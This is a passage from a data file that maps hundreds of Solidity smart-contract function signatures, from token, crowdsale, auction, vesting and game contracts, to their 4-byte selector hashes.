"0x96c74715", "BCB(uint256,string,string)": "0xabf8fbb8", "AISI()": "0xc987a78a", "setTeamAddress(address,address,address)": "0x47540b31", "setTimeBonus(uint256)": "0xf0d4c92d", "setRoundTime(uint256,uint256)": "0xfc9dc608", "setBonuses(uint256,uint256,uint256,uint256)": "0x4e1a50b7", "setAmount(uint256,uint256,uint256,uint256)": "0x9fdd983f", "setCheckBonus(bool)": "0xac216ae9", "setMinTokensToSale(uint256)": "0xd06b6f7e", "setPercentTokensToSale(uint256)": "0x79fe3b06", "initialMint()": "0x9fc5ce2a", "_withdraw(address,uint256,bool)": "0x67642794", "CBVO()": "0x9cf6f1eb", "Inonit(uint256,string,string,string)": "0x48c0dc5b", "recycleReward(uint256)": "0xbcc38018", "claimRewards()": "0x372500ab", "claimedRewardHook(uint256,address,address,uint256)": "0xfa5bfc1e", "addReward(uint256)": "0x74de4ec4", "LoggedReward(uint256,string,uint8,string,bool,bool)": "0xfc6fadec", "setTokenForSP(uint256)": "0x21aace42", "setTRM1BonusActive(bool)": "0x7d3dcbc3", "setMinTokenForSP(uint256)": "0x6444a288", "setTokenSPUsdCentPrice(uint256)": "0x0d498b1e", "setETHUSDdemon(address)": "0x10618776", "setBonus(uint256,uint256,uint256)": "0xfa5be8f8", "setAddressOfERC20OldToken(address,address)": "0x8136f02d", "setAddressOfERC20Token(address,address)": "0x4f4200e5", "oldTokenBalance(address)": "0xa879af45", "TRMCrowdsale()": "0x52a94adb", "distributeELTC(address[])": "0x3204dbc5", "ELTC()": "0xb1cdbe2a", "AxtrustICO(uint256)": "0xa7a066b7", "POOH()": "0x632488ff", "MolikToken()": "0x6f025aec", "rejectMint(uint256,uint256)": "0xcf4186cb", "approveMint(uint256)": "0x8aa6e6de", "rejectTransfer(uint256,uint256)": "0xe5c31ddc", "approveTransfer(uint256)": "0xcacca4a0", "setWhitelistContract(address)": "0x12f26140", "setNewValidator(address)": "0x1456979f", "isInvestorApproved(address)": "0xa59af340", "setPvtTokens(uint256)": "0x0c376ee6", "updateRateInWei()": "0x2bc5f9cb", "splitTokens()": "0xa7878831", "init(uint256,uint256,address,uint256,uint256,uint256,uint256)": "0xe8fc451a", "CryptolottoToken()": "0x850d8a14", "executeTxn(address,uint256,uint256)": "0xe5583c59", "confirmTransaction(address,uint256,uint256)": "0x6abf31eb", "submitTransaction(address,address,uint256,uint256,bytes)": "0xcf8c9cc8", "topBalance(address,uint256)": "0x6dd35c7b", "createWallet(uint256,address[],bytes32)": "0x20260697", "getLog(address,uint256,uint256)": "0x11262105", "getLogsNum(address,uint256)": "0x8bcddd5d", "getTxn(address,uint256,uint256)": "0x6b74c3d8", "getTxnNum(address,uint256)": "0x3f13d339", "getOwners(address,uint256)": "0x6ab71276", "getWalletId(address,bytes32)": "0x9b28db50", "ibaMultisig()": "0xf3905b82", "SNToken(uint256,string,string)": "0xb63bb5c6", "award(address,uint256)": "0x5d8a776e", "withReferrer(address)": "0x1916037d", "updateLock(bool)": "0xa1f91057", "WWW()": "0x3344e0b3", "ENC()": "0x65c5826f", "getCurrentTranche()": "0xe65b782f", "setPricing(uint256[])": "0x0b269898", "participateCrowdsaleSelected(address[])": "0x11b97324", "participateCrowdsaleInvestor(address)": "0x24ae84cc", "setFreezeEnd(uint256)": "0x54817301", "setPresaleParticipantWhitelist(address[],bool)": "0xcf1d8294", "Ripple()": "0x3da09d40", "REL(uint256,string,uint8,string)": "0x0be9f930", "inWhiteList(address,address)": "0x1a700013", "setGasInTokens(uint256)": "0x8059382a", "setAuctionFee(uint256)": "0xf59e754c", "setDefaultExecuteTime(uint256)": "0x45262b05", "delWhiteList(address,address)": "0x29d91164", "addWhiteList(address,address)": "0x9441e646", "delAcceptedToken(address)": "0x81086918", "addAcceptedToken(address)": "0x3eee83f1", "ownerAuctionCount(address)": "0x1a9aa710", "migrateAuction(uint256,address)": "0xc70fe6bd", "restartAuction(uint256,uint256,uint256)": "0xe1d2f649", "setWinner(address,uint256,uint256,uint256)": "0x1da83550", "_createAuction(address,address,uint256,uint256,uint256)": "0xe03e09a8", "receiveAuction(address,uint256,uint256,uint256)": "0xb783508c", "createLand(address)": "0x79e468ef", "updateTokenHolder(address)": "0x6f1a5b72", "hashAccountId(string)": "0xf9b3e7f0", "generateWithdrawalHash(string,uint256,address)": "0x4e38f205", "withdraw(string,uint256,address,bytes)": "0x2d7cdeb1", "Return(address,address,uint256)": "0x75457583", "CoinLotto(address)": "0xa05fc749", "batchCreateAssetSale(uint256[],uint256[],uint256[],uint256[])": "0x7ff860f6", "initiateCreateSale(uint256,uint256,uint256,uint256)": "0xb8bdf701", "toggleAttachedEnforcement(bool)": "0xc7e59334", "batchCreateETHCardAsset(uint8[],uint256[],uint256[],uint256[],address[])": "0x6723eab5", "batchCreateAsset(uint8[],uint256[],uint256[],uint256[],address[])": "0x098e652b", "updateEarnedBy(uint256,uint256)": "0x7fcf64b2", "getAssetAttachment(uint256)": "0xde0b18f2", "updateGenerationDict(uint256,uint64)": "0x8c1e04a6", "setGenerationSeasonController(uint256)": "0xd37990ce", "updateGenerationStopTime(uint256,uint8)": "0xe172a57e", "setPlayerOverrideId(uint256,uint256)": "0xe96d01d4", "giftAsset(address,uint256)": "0x3331f391", "removeAllAttachmentsFromCollectible(uint256)": "0x86a3171f", "addAttachmentToCollectible(uint256,uint256)": "0x9ad8b5b7", "updateCurrentGameCardId(uint256,uint256)": "0x635439ac", "getAbilitiesForCollectibleId(uint256)": "0x82d40041", "getGameCardId(uint256)": "0x6653be1a", "getPositionId(uint256)": "0x85d19a25", "setSaleManagerAddress(address)": "0x35f3cf85", "createETHCardCollectible(uint8,uint8,uint256,address,uint256,uint256,uint256)": "0x116ea900", "createRewardCollectible(uint8,uint8,uint256,address,uint256,uint256,uint256)": "0x41763225", "removeFromApproveList(address)": "0x568f57e1", "addToApproveList(address)": "0xd0b368a0", "_updateEarnedBy(uint256,uint256)": "0x81e9abef", "_updateMLBPlayerId(uint256,uint256)": "0x8c0ead61", "_updateGenerationSeasonFlag(uint256,uint8)": "0xde821a35", "getSequenceId(uint256)": "0x8239b1e7", "_createNFTCollectible(uint8,uint256,address,uint256,uint256[5])": "0x5e7f092c", "_updatePlayerOverrideId(uint256,uint256)": "0x2b9a7fae", "_approveForSale(address,address,uint256)": "0x055bb725", "_getAttributesOfToken(uint256)": "0x473e9408", "_createNFT(uint256[5],address,uint256)": "0xa76decce", "CLASSYToken()": "0x1a97d1fa", "ThanhnvToken()": "0x8a8bbd5c", "Error(string)": "0x08c379a0", "canUserAnswerQuestion(address,uint256)": "0xc74a2449", "removeOracles(uint256,address[])": "0x66fda50b", "assignOracles(uint256,address[])": "0x018d3490", "askQuestion(address,uint256,string,address[])": "0x571c4539", "prova3(uint256[])": "0x850382c8", "prova2()": "0x37f13fd6", "prova()": "0xde795edd", "yishiliToken()": "0xbd801ed4", "submitBlockHeader(bytes,uint256)": "0xd474a352", "submitBlockHeaders(bytes)": "0x8d92ce46", "FTKTToken()": "0xc01685d4", "SecuredLedgerToken()": "0xddc6ffaa", "ApzCoin()": "0xf731d33c", "withdrawETH(address,address)": "0x978d602a", "withdrawTokens(address,address,address,address)": "0x64e40eb9", "balanceOfETH(address)": "0x561cd462", "balanceOfToken(address,address,address)": "0x8fbc7eb0", "setGrandFactory(address)": "0x74544e2d", "takeICOInvestmentsEtherCommission(address,address)": "0x2a3ec4ff", "getAvailableEtherCommissions()": "0x94431f80", "getRegisteredTokens()": "0x14cbd993", "withdrawInvestmentsBeneficiary(address,address)": "0xded4980f", "getAvailableWithdrawInvestmentsForBeneficiary()": "0x2535dd53", "isPlatform()": "0xa054cbea", "Exploreon()": "0x8858ad6c", "klik()": "0x7a9110d5", "showRandomWinners()": "0xc7464e8a", "showTopWinners()": "0x1da790a1", "winnerWithdrawal()": "0x4c966822", "KYCApprove(address[])": "0xaf0b7029", "ownerWithdrawal(uint256)": "0xdff3f3b9", "findWinners()": "0x5ff8b778", "updateWinnersList()": "0x1cfdf90e", "MANHATTANPROXYMANAVE()": "0x54aee843", "LIZAToken(string,string,uint8,uint256)": "0x1b2e4002", "setComplianceService(address,address)": "0x1cc6f13d", "setTokensContract(address,address)": "0xac460d66", "setMyICOContract(address)": "0xbdeddb45", "fundICO(uint256,uint8)": "0x666e587d", "timestamp()": "0xb80777ea", "whoAmI()": "0xda91254c", "setBackendOperator(address)": "0x02262ced", "enter(bytes32,bytes8,uint32)": "0x09019ca0", "distributeLRN(address[],uint256)": "0x5dc6bfe4", "Learn()": "0xe63edfef", "Zillion()": "0x617605a1", "CKYAdv(uint256,string,string)": "0x79dbdbb9", "ChainKey(uint256,string,string)": "0xccf20872", "checkValue(uint256)": "0x18db62fb", "TKDToken()": "0x5617fb0d", "refineCoke(uint256)": "0x8e372dcd", "setRefineCost(uint256)": "0xf29c7870", "growWeed(uint256)": "0x34e415db", "setGrowCost(uint256)": "0x9b4d9ecc", "recruitNarco(uint256,string,string)": "0x67907404", "setRespectRequiredToRecruit(uint256)": "0xc805914a", "updateNarco(uint256,string,string)": "0x554571db", "setPersonalisationCost(uint256)": "0x0a59bf2d", "setChangeIdentityNarcoRespect(uint256)": "0x817b106e", "DopeRaiderCore()": "0x875ad967", "createGen0Auction(string,string)": "0x71ae973e", "createPromoNarco(string,string,address)": "0x82402743", "narcosByOwner(address)": "0xf4edb15b", "getLevel(uint256)": "0x86481d40", "_createNarco(string,string,address)": "0xad1a38be", "_setDistrictAddresss(address,address)": "0x48b43020", "setDistrictAddress(address,address)": "0x0ae31fbd", "AtoOneCoin(uint256,string,uint8,string)": "0x6e9d3b9d", "Pharamore()": "0x9cbafcb6", "Raffle()": "0xbe2dbe21", "Rotterdam()": "0x285a4639", "KansasvsClemson()": "0x46503c01", "A2ABToken()": "0x1bb0b762", "ratingList()": "0x45df925f", "ratingOf(uint16)": "0x63d2be9d", "vote(uint16,uint256)": "0x7de576cd", "CountryCoin()": "0x12b48d3c", "NBAOnlineLaunchPromotion()": "0x39bf03b4", "KOToken()": "0x831b19c2", "UCASH()": "0xef228e1a", "ZenswapNetwork()": "0xf0149b9d", "EtherDOGEICO()": "0xf691e362", "donation()": "0x8edeb15d", "delegatedTransfer(address,address,uint256,uint256)": "0x1b208786", "ITE()": "0xf0a03aa3", "admin_set_withdraw(address,bool)": "0xe85353e1", "admin_set_dividend(address,bool)": "0xf959fe4b", "admin_set_withdrawable(bool)": "0x53e4d8ef", "admin_set_payable(bool)": "0x451f7763", "admin_set_ExchangeRateInWei(uint256)": "0x0281b752", "admin_set_Apply_Store_Id_Fee(address,address)": "0x5e5650ef", "admin_dividend(int256,int256)": "0xff7c977f", "setIcoFinish(uint256)": "0x0556fcd0", "createAuctionWhenPaused(address,address,uint256,uint256,uint256,uint256)": "0xd9f0cf04", "LoveToken(uint256,string,uint8,string)": "0x7bb6fc6b", "ITIX()": "0x0453e3b1", "SilverCoin()": "0x48da08e6", "TureTreasureChain()": "0xf89037a9", "vestingsRemainBalance(address)": "0xc111368b", "vestingsReleasedRemain(address)": "0xa7403160", "vestingsBalance(address)": "0xa4bad0ae", "withdrawVestings(address)": "0xd3066879", "vestingReleased(uint256,uint256,uint256,uint256,uint256)": "0xb20d3b1c", "queryVestingRemain(uint256,uint256)": "0xeb1fa690", "queryWithdrawed(uint256)": "0x5bfdab26", "vestingFunc(uint256,uint256,uint256,uint256,uint256,uint256)": "0x24627547", "internalPresale(address,uint256)": "0xf13016d5", "batchPresale(address[],uint256[])": "0x5a778cf9", "presale(address,uint256)": "0xf8a34b26", "internalPresaleVesting(address,uint256,uint256,uint256,uint256,uint256)": "0xfd460302", "batchPresaleVesting(address[],uint256[],uint256[],uint256[],uint256[],uint256[])": "0x6b5396dc", "presaleVesting(address,uint256,uint256,uint256,uint256,uint256)": "0x8d012295", "removeConfirm(bytes)": "0xf4c06c8e", "getResult()": "0xde292789", "getBestMatch()": "0x9c09bb4e", "getMatchFromList(uint256)": "0xec99c60c", "getNumberOfChecks()": "0xf9b83323", "bubbleSortAllMatches()": "0x6077759c", "createMatch(uint256,uint256)": "0xf5a0ea6c", "setBestMatch(uint256,uint256,address)": "0xcced9b63", "findBest(uint256,uint256)": "0xed3390ea", "findBestMatch()": "0xce4e5aa4", "startCall(uint256)": "0x29245dd1", "Swob()": "0x1b542aa7", "AddOrigin(address)": "0xd5a056d8", "SetWhy(uint32)": "0xcbd243b4", "SetAccessType(uint32)": "0xd17a1b5b", "SetRecord(address)": "0xab6f78f0", "SetRecordType(uint32)": "0xa368107b", "GetAll()": "0xa5440fa0", "GetCount()": "0x0ab93971", "RemoveAll()": "0xc378f1af", "Remove(uint256)": "0x476e4aa4", "CategoryCatalog()": "0x5c68908b", "kill(address,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0x48a9866b", "badBoardSent(bytes10,uint256,uint8,bytes32,bytes32,bytes10,uint256,uint8,bytes32,bytes32)": "0xd054cd87", "sendBoard(bytes10,uint256,uint8,bytes32,bytes32)": "0x49d463e6", "unilateralRuling(uint8,uint256,uint256)": "0xb3034371", "sendState(bytes,uint256,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0xcdad5f94", "gridToIndex(uint256,uint256)": "0xd8e3c33f", "createAdjudicator()": "0x5aa1eb4c", "TicTacToeRules(address,address,address,address,uint256)": "0x0ef25f8b", "setMaximumSellableTokens(uint256)": "0x2c2de40a", "completion()": "0xed5d6fbc", "TruPreSale(uint256,uint256,address,address)": "0x1bcc9b1a", "canPerform(address,bytes32,uint256[])": "0xa1658fad", "updateExchangeRate(uint256)": "0xb9e205ae", "depositTokens(address)": "0x56bccf91", "depositEthers(address)": "0xcc64e2d5", "HandsOnToken(uint256,string,uint8,string)": "0xa6ce8c29", "addToWhitelist(address)": "0xe43252d7", "localsReptoken(uint256,string,uint8,uint256,string,string)": "0xb3141c69", "getTokenGranteesLength()": "0xff1d83ae", "setTokensSold(uint256)": "0x2387c87d", "KinTokenSaleMock(address,uint256)": "0xa239d260", "after10Seconds()": "0xefb8b6b1", "after20Seconds()": "0xa5a6a7b2", "setFooInt(uint256)": "0xccd75361", "timeInfo()": "0x4865c7bf", "FooTime()": "0x3fd3370a", "SLMToken()": "0xb1b6aecb", "totalContributionsBySender(address)": "0xd52230c4", "totalContributions()": "0x37c08923", "StandardCampaign(string,uint256,uint256,address,address)": "0x48e3a064", "claimRefundOwed(uint256)": "0x9d13156c", "payoutToBeneficiary()": "0xa63c7ba2", "contributeMsgValue()": "0xdb0251e9", "checkInvarience()": "0x3cf3f105", "killMeshPoint(int256,address,address,string,address)": "0x2acc204c", "revokeAccess(address,int256,address)": "0x736d7ee9", "authorizeAccess(address,int256,address)": "0xac96f981", "requestAccess(address,int256,address)": "0xfbc9c601", "createMeshPoint(int256,string)": "0x790cbfa0", "getFaucets()": "0xf1644b6c", "getMeshPointByName(int256,string)": "0xd8b120c1", "getMeshPointByCreator(int256)": "0xa6d00693", "MeshPointManager(int256)": "0xcefeb6f7", "transferTokens(address,address,uint256)": "0xa64b6e5f", "changeTokenHolder(address,address)": "0x3bacf5ed", "initialization()": "0xc172085e", "CreditUnits()": "0x4e500760", "secure(uint256,string)": "0xc2eac875", "freezeAPI(uint256,string)": "0xf0a3d4fd", "freeze(uint256)": "0xd7a78db8", "getCubeCount()": "0x8ef326ea", "isTakePermitted(uint256,uint256,uint256,address,address,uint256,uint256,address)": "0xc6434660", "getPaidDIVDSchedule()": "0xaa9b5ba8", "getLastDIVDPeriod()": "0xd152865b", "getDIVDPayoutPercent()": "0xe638f372", "getInvArray()": "0xc2ea5c9e", "getInvId()": "0x49c6353c", "getPeriodicalPnL()": "0x04bd05d5", "getPeriodicalAR()": "0xb73fe29c", "getARInvIndexTable()": "0xf7326286", "getARInvTable()": "0x0cf6d879", "getARSchedule()": "0xc077b0f9", "getTotalInvestment()": "0xf9cb1b48", "getInvestmentArray()": "0x001d7bf6", "getInvestorArray()": "0xb9484955", "getInvestorIndex()": "0xc4b296a7", "getRevForecast()": "0x04751333", "getLastAPPeriod()": "0x6a1c3a4c", "getTotalBudget()": "0x7dfc64ca", "getTotalPeriods()": "0xaff74c6d", "getPeriodicalBudget()": "0x80c99dd2", "getAPSchedule()": "0x6db1218d", "getAPAddressSize()": "0x5f1b3ee6", "getAPAddresses()": "0x094493b9", "getStartDateOfPlan()": "0x4652e9fe", "getStateOfPlan()": "0xcfb9e26f", "vote()": "0x632a9a52", "initVote(uint256)": "0x1d7fb62f", "processDIVD()": "0xd85a82f6", "getPeriodCycle(uint256)": "0xe45fc71f", "getPeriodStartTimestamp(uint256)": "0x872887c2", "getPeriodIdx(uint256)": "0x747ad1c1", "victorieumStatic1Token()": "0x894b8d2e", "IOBSTestToken()": "0xea1a9537", "Reject()": "0xcba59827", "CKAOTToken()": "0xf038e106", "addMapping(string)": "0x40275f73", "addEvent(string,uint256)": "0xf0e1691a", "ProudofYourCoin()": "0xe1d35155", "calculatePerformanceBonus(uint256)": "0x3b0107fc", "depositFee(uint256)": "0x423c485a", "depositVault(uint256)": "0x5a02ec19", "updateNAV(uint256)": "0x0cb1982b", "setSmallWalletAddress(address)": "0x3f0adce9", "setLargeWalletAddress(address)": "0x40f9c62c", "setFeeWalletAddress(address)": "0x31503ec4", "setRequestLimitInterval(uint256)": "0xb89c5932", "setRequestLimit(uint256)": "0x6a12209c", "setMaxRequestQuota(uint256)": "0x1176205e", "setRedeemLevel(uint256)": "0x86dd03bd", "setPerformanceBonus(uint256)": "0x2a98e802", "setROI(uint256)": "0x1891381d", "setLockUpPeriod(uint256)": "0x5b02b729", "setIsFixed()": "0x830b3a1e", "restart(uint256)": "0x1801f38e", "getRefundValue(address)": "0xe54c4f98", "isPresaled(address)": "0x0b6f46ed", "getRedeemRequestsLength()": "0x48e66722", "getRedeemValue(uint256)": "0x97d61c46", "setCAPAddress(address)": "0x153fbb81", "delWhitelist(address,address[])": "0x3baad248", "addWhitelist(address,address[])": "0x6e6e8a02", "isWhite(address,address)": "0xdbf44530", "CLPToken()": "0x07a878f6", "lockFund(uint256)": "0x3ba2a67e", "totalWithdrawable()": "0x0600a865", "totalLockedFund()": "0xdd42c228", "MIToken(uint256,string,uint8,string)": "0x6f8c3c0e", "sendMessage(address,bytes)": "0xbb5ddb0f", "register(uint256,uint256,uint256,uint256,uint256)": "0xdc22eba6", "getNumProducts()": "0x6bad77e1", "removeProduct(address)": "0x787b6725", "addProduct(address)": "0xf44a6ca9", "externalCheckSignBool(bytes32,bytes,address)": "0xfffeb1ca", "ITECH()": "0x9333a122", "_createCryptsy(uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32,address)": "0x9d8d911e", "Voiptoken()": "0x5e02b84d", "FlipNA()": "0xbd2fffb3", "checkCertificates(uint256)": "0x1af48c85", "clearRequest(uint256)": "0xf143e6db", "countStudent()": "0x03627e70", "ApplyforCertification(string,string,string,string,string,string)": "0xa44ead73", "addCourse(string,string,string,string,uint8,uint8)": "0xe62b795c", "buyTicketByOther(uint256,bytes32,bytes32,bytes32)": "0xd3e65b6c", "buyTicketByEth(uint256,bytes32,bytes32,bytes32)": "0x42b594cb", "addNewOrUpdateHolder(uint256,bytes32,bytes32,bytes32)": "0xe2ca01f0", "addNewTicket(uint256,bytes32,uint256,uint256,uint256,bytes32,string)": "0xdcd4eb14", "addInvestorList(address,uint256)": "0xff992ef5", "getTotalCurrentSaled()": "0x1abb0ba9", "allocateReserveCompanyTokens()": "0xf7d91cd4", "CLPContractToken()": "0x00873c97", "CodysToken()": "0xe2bd8e43", "getStrategyAtIndex(uint256)": "0x41d1a4d6", "updateStrategyLabel(bytes15,string)": "0x19a6b356", "updateStrategyCategory(bytes15,uint256)": "0xe0fe4a84", "updateStrategyAddress(bytes15,address)": "0x6977083e", "getStrategy(bytes15)": "0xb0e572c8", "deleteStrategy(bytes15)": "0xedfceace", "insertStrategy(bytes15,address,uint256,string)": "0x0aeb1552", "isStrategy(bytes15)": "0xe43ba0bd", "Pruebalillo()": "0xc7825c3f", "milestoneStarted(uint256)": "0x460fce3b", "openDispute(string)": "0x595210ad", "executeVerdict(bool)": "0x66c9d697", "acceptArbiter()": "0x7cc3beb2", "addArbiter(address,uint256)": "0xe6530b97", "addAcceptedArbiter(address)": "0x96ae44f6", "deleteInvestContract()": "0x06bc7ef3", "investContractDeposited()": "0x441b4f01", "addInvestContract(address)": "0x681fd129", "startNextMilestone()": "0x18d0073e", "finishMilestone(string)": "0x06fe0c29", "editMilestone(uint256,uint256,uint256,uint256,uint256,string)": "0xd3bdbd8f", "addMilestone(uint256,uint256,uint256,uint256,string)": "0x8243fd61", "asyncTokenSend(address,uint256)": "0x906273a3", "withdrawTokenPayment()": "0x8113e285", "withdrawEtherPayment()": "0x93046a13", "simpleToken()": "0x2a64e635", "SMRToken()": "0xe0401918", "mirtestToken()": "0x6f9cd7b2", "findAddressByEndpoint(string,int256)": "0xe9ad1b38", "registerEndpoint(string,int256)": "0x786edae0", "VictorieumNewICO2Token()": "0x1e9b91db", "Yaraq()": "0x8a808acf", "SaveCryptoToken()": "0xd48a9340", "AddNewCurrency(string,string,string)": "0xb84f1318", "AddNewChallenge(uint256,uint256,uint256,uint256,bool,string)": "0x0a12c90f", "EternalStorageProxyForPayinMultisender(address)": "0x312cba69", "innerContract(string)": "0xc38c9800", "koinconekt()": "0xcb8ff46f", "transfer(uint256,string,bytes)": "0x572c1517", "changeSigner(address)": "0xaad2b723", "purchaseTokens(uint256,address,bool)": "0x3faff9d5", "ProofOfRipple()": "0x0c54ce44", "GoodBoyPoints(uint256,string,string)": "0xe4cf77bb", "airDrop(address,address,address[],uint256[])": "0xdd719d2c", "zpzToken(uint256,string,uint8,string)": "0x1a488a60", "LP(uint256,string,string)": "0x4b866981", "safesub(uint256,uint256)": "0x0d6c66a1", "safeadd(uint256,uint256)": "0x156e5039", "PMET(uint256,string,string)": "0xfe996956", "TokenBCCO(uint256,string,string)": "0xaed3ebe4", "EtherNetworkConfig()": "0x21974a74", "CTAMToken()": "0xf21c27a7", "GOGRN()": "0x651c9e99", "emulatePurchase(address,address,uint256,uint256)": "0x71560f80", "withdrawBtc(bytes,uint256)": "0x3294ab00", "setRates(uint256,uint256,uint256)": "0xd004f38b", "HcftSale(address,address)": "0x2339dd43", "setRate(address,uint256)": "0x2bdb7097", "checkPurchaseValid(address,uint256,uint256)": "0x15781c80", "setWhitelistInternal(address,bool)": "0x4034af00", "MintingSale(address)": "0xe170dd81", "burnWithData(address,uint256,bytes)": "0x83e49c53", "verifyCanWithdraw(address,address,uint256)": "0x9f2eaf4e", "toBytes20(bytes,uint256)": "0x4e7cff38", "doPurchase(address,uint256,uint256)": "0xd6d6945e", "getSold(address,uint256)": "0x6b8393dd", "receiveWithData(bytes)": "0x949a9d59", "receive(address,uint256,bytes)": "0x27d23b86", "onReceive(address,address,uint256,bytes)": "0x08761432", "getRate(address)": "0x37cef791", "HBToken()": "0xaf67cdc4", "BitPropertyToken()": "0xc6776239", "CoinTroops()": "0xa1ba0331", "_end()": "0x3c20ee6e", "longBuy()": "0x6ff26ebb", "mediumBuy()": "0x9956a28c", "shortBuy()": "0x0ab4debd", "lockupOf(uint256)": "0xbede4bd8", "amountOf(uint256)": "0xe8eb2284", "SaturnPresale(address,address,uint256)": "0x6373786a", "ANIMETOKEN()": "0x80f7e238", "internalCalculateBonus(uint256,uint256,uint256)": "0xef427776", "withdrawLRC()": "0x6c825035", "depositLRC()": "0xd678ba48", "lrcBalance()": "0x0fc33bb7", "LRCLongTermHoldingContract(address,address)": "0xcebac2f2", "deletePetition(uint256)": "0xec0b3de4", "withdrawFromContract(address,uint256)": "0x837381fa", "withdrawFromAmt()": "0x823f57ca", "alterFeaturePetitionFee(uint256)": "0xa9d72f82", "viewFeaturePetitionFee()": "0x8f92d308", "viewPeerToPeerMarketplaceTransactionFee()": "0x2c6009a6", "alterPeerToPeerMarketplaceTransactionFee(uint256)": "0x47f95923", "alterCreatePetitionFee(uint256)": "0x149cd0be", "viewCreatePetitionFee()": "0x5fc75bf2", "alterInitialPricePerShare(uint256)": "0x5db5fc24", "viewInitialPricePerShare()": "0xcb2c05dc", "alterFeaturedLength(uint256)": "0x868df7f6", "viewFeaturedLength()": "0xefe1525e", "spendAdvertising(uint256,uint256)": "0x11857ed7", "alterDividendCooldown(uint256)": "0x97ad1cbf", "companyShares()": "0xfb01badd", "initialOwnersShares()": "0x4a2479c0", "unsign(uint256)": "0x5e1e547d", "sign(uint256)": "0x2fb1b25f", "advertisingUse(uint256,uint256)": "0x797c6f3a", "cutToInvestorsDividendPool(uint256)": "0x48389870", "advertisingDeposit(uint256)": "0x3c61d003", "viewPetitionSigner(uint256)": "0xb8121fe4", "viewPetitionSignerWithAddress(address,uint256)": "0x0c7452b8", "viewPetition(uint256)": "0x77c82476", "renewFeatured(uint256)": "0xfc342947", "createPetition(string,string,uint256,bool,string)": "0x3f40adb8", "buySharesFromListing(uint256)": "0x8bee78e6", "removeShareholderListing(uint256)": "0xaafba184", "viewShareholderListing(uint256)": "0xe9989220", "listSharesForSale(uint256,uint256)": "0xf74fc598", "transferShares(uint256,address)": "0x45579b1f", "viewDividendCooldown()": "0x1af82fbf", "ViewDividendPoolEnds()": "0xd4fdbcff", "viewLastClaimedDividend(address,address)": "0x41e884d4", "viewClaimedThisPool()": "0xf5a8ea09", "viewClaimableInvestorDividendPool()": "0xb3e98f82", "viewInvestorDividendPool()": "0xbcd88a61", "viewInvestorDividendHistory(uint256)": "0x8a1489e3", "collectDividend()": "0xa98325b6", "endDividendPool()": "0xdd6b996d", "viewPetitionShareholder(uint256)": "0x607cbaff", "viewPetitionShareholderWithAddress(address)": "0xcafab7e1", "viewMaxShares()": "0x93c4ade0", "viewSharesSold()": "0x5520002a", "GoozeToken(uint256,string,uint8,string)": "0x816c76e3", "MasterCoin()": "0xd29208d4", "_transter(uint256)": "0x6cffa0cd", "DECoin()": "0x179101a6", "RepuToken()": "0x6fe64289", "JEXToken()": "0x28ef26cc", "Goutex(uint256,string,uint8,string)": "0x77627a1d", "TetherToken(uint256,string,string,uint256)": "0x88d723ac", "IcxToken(uint256,address)": "0x088c20de", "TimeChainToken(uint256,string,string,address)": "0x17e30f6b", "withdrawn(address)": "0x6ef61092", "withdrawInternal(address)": "0x7ea61ed7", "withdrawOnBehalfOf(address)": "0x032a8838", "withdrawable(address)": "0xce513b6f", "vested(address,uint256)": "0x0f059913", "addEntry(address,uint256,bool,uint256,uint256)": "0x78579d7c", "addEntryInSecondsPeriods(address,uint256,bool,uint256,uint256)": "0x655e4224", "addEntryIn24WeekPeriods(address,uint256,bool,uint256)": "0x9aafbff0", "addEntryIn4WeekPeriods(address,uint256,bool,uint256)": "0xbf09466f", "plain()": "0x59748c98", "cancelTx()": "0xf0cd5c17", "setCancelFee(uint256)": "0xc2fffd6b", "withdrawUnsold()": "0x61d6d385", "Crowdsale(address,uint256,uint256,address,address,uint256,uint256,uint256,uint256)": "0xd1a2749c", "setWeiCap(uint256)": "0x015fa6c1", "KYCPresale(address,uint256,uint256,uint256)": "0x0ad40377", "getKYCPresalePayload(bytes)": "0x2a781f78", "COOPToken()": "0x72b4f111", "OSCoinToken()": "0x655042ee", "play(uint256,uint16,uint8)": "0xa73c0ba2", "setMaxWin(uint8)": "0x5eeeee22", "setMinBetPerRoll(uint256)": "0xe0a82ea8", "setHouseEdge(uint8)": "0x0c559757", "EOSBetDice()": "0x47a68cd4", "updateItemTraits(uint256,uint256)": "0x4a2f37a6", "destroyMultipleItems(uint256[])": "0x2e3a0a7c", "destroyItem(uint256)": "0xf7c8af48", "giveMultipleItemsAndDestroyMultipleItems(address,uint256[],uint256[])": "0x1fe8629a", "giveMultipleItemsToMultipleRecipients(address[],uint256[])": "0x68fbbab8", "giveMultipleItems(address,uint256[])": "0x08e88ab9", "giveItem(address,uint256)": "0xd86afbbb", "getUnsoldTokensVal(uint256)": "0x07489f92", "allTimeDiscount(uint256)": "0xfc5c0cde", "ProvideWorkOrder(address,address,address,uint128)": "0x6f91cec0", "changeFeeAccount2(address)": "0x48acd9b1", "BITOX(address,address,address,address,uint256,uint256,uint256)": "0x06a33300", "SBGToken()": "0xd9f00023", "Magic10(uint256,address)": "0xce9822c7", "OWEToken()": "0xa59162eb", "CMCLToken(uint256,string,string)": "0x49c16cc3", "LicenseCore()": "0x41068ae2", "renew(uint256,uint256)": "0xc475abff", "purchase(uint256,uint256,address,address)": "0xa7bf1b6c", "createPromotionalRenewal(uint256,uint256)": "0x7d0385c2", "createPromotionalPurchase(uint256,uint256,address,uint256)": "0x3ac6dd9d", "setRenewalsCreditAffiliatesFor(uint256)": "0xcc293aea", "setAffiliateProgramAddress(address,address)": "0x08b8d60f", "_affiliateProgramIsActive()": "0xde998dd0", "_performRenewal(uint256,uint256)": "0xcb297ef0", "_handleAffiliate(address,uint256,uint256,uint256)": "0xfa448f7a", "_createLicense(uint256,uint256,address,uint256,address)": "0x3f8c75a6", "_performPurchase(uint256,uint256,address,uint256,address)": "0xe2eb3336", "_removeToken(address,uint256)": "0x4c5a94fe", "_addToken(address,uint256)": "0xd8c94cd5", "disapproveAll(address)": "0x51dabd45", "approveAll(address)": "0x0621472c", "isSpecificallyApprovedFor(address,uint256)": "0xa94e7ed4", "isSenderApprovedFor(uint256)": "0x4eae8e30", "setTokenMetadataBaseURI(string)": "0x1e20363a", "isSubscriptionProduct(uint256)": "0x0528bb57", "costForProductCycles(uint256,uint256)": "0x27597f0a", "getAllProductIds()": "0x663c01af", "productInfo(uint256)": "0xbb119f6e", "renewableOf(uint256)": "0x4dac7d6f", "intervalOf(uint256)": "0xb369af71", "totalSold(uint256)": "0x93b2467e", 